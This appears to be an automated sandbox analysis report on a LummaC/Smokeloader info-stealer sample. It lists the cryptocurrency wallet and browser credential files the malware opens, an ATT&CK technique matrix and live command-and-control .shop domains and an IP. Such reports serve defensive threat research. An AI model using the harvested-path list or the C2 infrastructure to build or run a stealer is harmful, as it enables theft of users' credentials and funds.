              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2227392089.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2265630337.0000000002831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2250362177.0000000002831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2279583257.000000000283E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3800, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		12
              Virtualization/Sandbox Evasion              		LSASS Memory12
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin Shares31
              Data from Local System              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object Model2
              Clipboard Data              		Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
              Obfuscated Files or Information              		LSA Secrets12
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              6xmBUtHylU.exe42%ReversingLabsWin64.Trojan.Smokeloader
              6xmBUtHylU.exe30%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              citizencenturygoodwk.shop10%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/api9(0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/ez0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/api=/0%Avira URL Cloudsafe
              radiationnopp.shop0%Avira URL Cloudsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/.0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/apiU60%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://login.microsoftonline.com/stream0%Avira URL Cloudsafe
              publicitttyps.shop0%Avira URL Cloudsafe
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%Avira URL Cloudsafe
              answerrsdo.shop0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop:443/api100%Avira URL Cloudmalware
              citizencenturygoodwk.shop0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/apiX0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/apie6-0%Avira URL Cloudsafe
              benchillppwo.shop0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/z0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/0%Avira URL Cloudsafe
              https://management.core.chinacloudapi.cnFrame0%Avira URL Cloudsafe
              bargainnykwo.shop0%Avira URL Cloudsafe
              bouncedgowp.shop0%Avira URL Cloudsafe
              https://management.chinacloudapi.cnCONTINUATION0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/api100%Avira URL Cloudmalware
              https://citizencenturygoodwk.shop/4Y0%Avira URL Cloudsafe
              bannngwko.shop0%Avira URL Cloudsafe
              https://management.core.usgovcloudapi.nethttp2:0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop:443/apiK0%Avira URL Cloudsafe
              https://management.azure.cominvalid0%Avira URL Cloudsafe
              https://login.chinacloudapi.cn/http2:0%Avira URL Cloudsafe
              affecthorsedpo.shop0%Avira URL Cloudsafe
              https://support.mozilla.org/products/firefoxgro.all0%Avira URL Cloudsafe
              https://citizencenturygoodwk.shop/apiP0%Avira URL Cloudsafe
              https://www.mozilla.or0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              citizencenturygoodwk.shop
              		188.114.96.3
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              radiationnopp.shoptrue
              • Avira URL Cloud: safe
              		unknown
              publicitttyps.shoptrue
              • Avira URL Cloud: safe
              		unknown
              answerrsdo.shoptrue
              • Avira URL Cloud: safe
              		unknown
              citizencenturygoodwk.shoptrue
              • Avira URL Cloud: safe
              		unknown
              benchillppwo.shoptrue
              • Avira URL Cloud: safe
              		unknown
              bargainnykwo.shoptrue
              • Avira URL Cloud: safe
              		unknown
              bouncedgowp.shoptrue
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/apitrue
              • Avira URL Cloud: malware
              		unknown
              bannngwko.shoptrue
              • Avira URL Cloud: safe
              		unknown
              affecthorsedpo.shoptrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/api=/BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/ezBitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/api9(BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/.BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://citizencenturygoodwk.shop/apiU6BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://login.microsoftonline.com/stream6xmBUtHylU.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgBitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://citizencenturygoodwk.shop:443/apiBitLockerToGo.exe, 00000003.00000003.2279134881.0000000002823000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              https://citizencenturygoodwk.shop/apiXBitLockerToGo.exe, 00000003.00000003.2238156888.0000000002871000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002871000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/apie6-BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/zBitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://management.core.chinacloudapi.cnFrame6xmBUtHylU.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://management.chinacloudapi.cnCONTINUATION6xmBUtHylU.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://management.core.usgovcloudapi.nethttp2:6xmBUtHylU.exefalse
              • Avira URL Cloud: safe
              		unknown
              http://x1.c.lencr.org/0BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://x1.i.lencr.org/0BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000003.00000003.2250701299.0000000004B0D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://citizencenturygoodwk.shop/4YBitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop:443/apiKBitLockerToGo.exe, 00000003.00000002.2328165604.00000000027E8000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://management.azure.cominvalid6xmBUtHylU.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://login.chinacloudapi.cn/http2:6xmBUtHylU.exefalse
              • Avira URL Cloud: safe
              		unknown
              https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://citizencenturygoodwk.shop/apiPBitLockerToGo.exe, 00000003.00000003.2238156888.0000000002831000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://www.mozilla.orBitLockerToGo.exe, 00000003.00000003.2251991909.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              188.114.96.3
              		citizencenturygoodwk.shopEuropean Union
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1467945
              Start date and time:2024-07-05 06:02:09 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 11s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:6xmBUtHylU.exe
              renamed because original name is a hash value
              Original Sample Name:b82c80a3ce9b5c44391d3f11307f8b8e.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/0@1/1
              EGA Information:
              • Successful, ratio: 50%
              HCA Information:
              • Successful, ratio: 51%
              • Number of executed functions: 28
              • Number of non-executed functions: 47
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target 6xmBUtHylU.exe, PID 6552 because there are no executed function
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              00:03:09API Interceptor8x Sleep call for process: BitLockerToGo.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.96.3http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
              • www.telegramkv.com/
              Scan405.exeGet hashmaliciousFormBookBrowse
              • www.jjjw.xyz/ypml/
              AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
              • www.coinwab.com/efdt/
              http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
              • business.ifbsmetaiidentiityconfirms.com/favicon.ico
              BL Draft.exeGet hashmaliciousFormBookBrowse
              • www.ediancai.cn/x7r2/
              QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • filetransfer.io/data-package/btd2ptah/download
              Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
              • www.ad14.fun/oc7s/
              spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
              • www.ad14.fun/oc7s/
              9098393827383039.exeGet hashmaliciousFormBookBrowse
              • www.coinwab.com/kqqj/
              SOA 020724.exeGet hashmaliciousFormBookBrowse
              • www.ad14.fun/az6h/?Vn=Ydx4qJJ0n&3jJlx=2tWzkzncG4ra8DBegJJBToW7oB13AdJXZ1KkbDLW+Ah9MGsNEQDOdLre6u2t4zOJ63yLnsPJ97sPnqMxsSzbOxuABFq0Im2Ecm9EQ8GOdhogxDCvRrrALITlDFg7ZHNgcXHQPxMcHnGf

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSXX(1).exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.67.74.152
              OVER DUE INVOICE PAYMENT.docxGet hashmaliciousSnake KeyloggerBrowse
              • 188.114.96.3
